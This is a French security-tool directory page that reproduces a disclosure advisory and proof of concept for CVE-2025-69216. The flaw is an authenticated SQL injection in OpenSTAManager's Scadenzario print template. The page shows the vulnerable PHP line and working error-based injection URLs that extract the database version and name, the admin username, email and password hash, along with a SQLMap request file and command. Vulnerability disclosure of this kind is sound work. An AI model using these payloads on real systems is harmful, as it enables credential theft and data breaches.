Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-69216 — Dépôt de preuve de concept pour CVE-2025-69216, une injection SQL authentifiée dans le modèle d'impression Scadenzario d'OpenSTAManager, permettant l'extraction des identifiants administrateur et du contenu de la base de données via une SQLi basée sur les erreurs et aveugle. | Kitploit
Outils/GitHubGitHub/lukasz-rybak/cve-2025-69216
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

Dépôt de preuve de concept pour CVE-2025-69216, une injection SQL authentifiée dans le modèle d'impression Scadenzario d'OpenSTAManager, permettant l'extraction des identifiants administrateur et du contenu de la base de données via une SQLi basée sur les erreurs et aveugle.

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-69216 : OpenSTAManager présente une injection SQL dans le modèle d'impression Scadenzario

Aperçu

ChampDétails
Identifiant CVECVE-2025-69216
SévéritéÉLEVÉE
AvisVoir l'avis
Découvert parLukasz Rybak

Produits concernés

  • devcode-it/openstamanager (versions: <= 2.9.8)

Classification CWE

  • CWE-89: Neutralisation incorrecte d'éléments spéciaux utilisés dans une commande SQL ('Injection SQL')

Détails

Résumé

Une vulnérabilité d'injection SQL authentifiée dans le modèle d'impression Scadenzario (Échéancier de paiement) d'OpenSTAManager permet à tout utilisateur authentifié d'extraire des données sensibles de la base de données, notamment les identifiants administrateur, les informations clients et les enregistrements financiers. La vulnérabilité permet un accès complet en lecture à la base de données via des techniques d'injection SQL basées sur les erreurs.

Détails

La vulnérabilité se trouve dans templates/scadenzario/init.php à la ligne 46, où le paramètre id_anagrafica est directement concaténé dans une requête SQL sans désinfection appropriée :

Code vulnérable :

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

La fonction get() récupère les entrées utilisateur des paramètres GET/POST sans validation. La valeur du paramètre est directement intégrée dans la chaîne de requête SQL par concaténation de chaînes au lieu d'utiliser la fonction de désinfection prepare() de l'application, permettant ainsi des attaques par injection SQL.

Cause racine :

  • Absence d'utilisation de la fonction prepare() pour la désinfection des entrées
  • Concaténation directe de chaînes dans la construction de la requête SQL
  • Aucune validation d'entrée ni vérification de type

Point d'accès affecté :

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Fichiers affectés :

  • templates/scadenzario/init.php (ligne 46) - Vulnérabilité principale
  • templates/scadenzario/init.php (lignes 34, 40) - Schéma similaire avec les paramètres de date
  • pdfgen.php - Point d'entrée pour le rendu du modèle

PoC (Preuve de concept)

Prérequis

  • Session authentifiée valide (tout rôle utilisateur)

Étapes d'exploitation

1. Confirmer la vulnérabilité - Test d'erreur de syntaxe de base :

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

Erreur de syntaxe SQL affichée dans la réponse de l'application

image

2. Extraire la version de la base de données - SQLi basée sur les erreurs :

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Résultat : ~8.3.0~ (version MySQL)

image

3. Extraire le nom de la base de données :

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Résultat : ~openstamanager~

image

4. Extraire le nom d'utilisateur administrateur :

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Résultat : ~admin~ image


5. Extraire l'e-mail administrateur :

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Résultat : Adresse e-mail de l'administrateur

image

6. Extraire le hachage du mot de passe (partiel - limite de 31 caractères XPATH) :

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Résultat : Hachage bcrypt du mot de passe

image

7. Exploitation automatisée avec SQLMap :

Créer le fichier de requête sqli_osm.req :

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Exécuter SQLMap :

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

Types d'injection confirmés par SQLMap :

  • ✅ Injection SQL aveugle basée sur les booléens
  • ✅ Injection SQL basée sur les erreurs (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Injection SQL aveugle basée sur le temps (SLEEP)
image

Impact

Qui est concerné :

  • ✅ Tous les utilisateurs authentifiés - Tout utilisateur disposant d'identifiants valides peut exploiter cette vulnérabilité
  • ✅ Utilisateurs à faibles privilèges - Même les utilisateurs avec des permissions minimales peuvent accéder aux données de niveau administrateur
  • ✅ Toutes les installations d'OpenSTAManager - La vulnérabilité existe dans la branche master la plus récente

Attribution

Signalé par Łukasz Rybak

Références

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

Avis de non-responsabilité

Ce CVE a été divulgué de manière responsable conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici sont uniquement à des fins éducatives et défensives.

Télécharger l’outil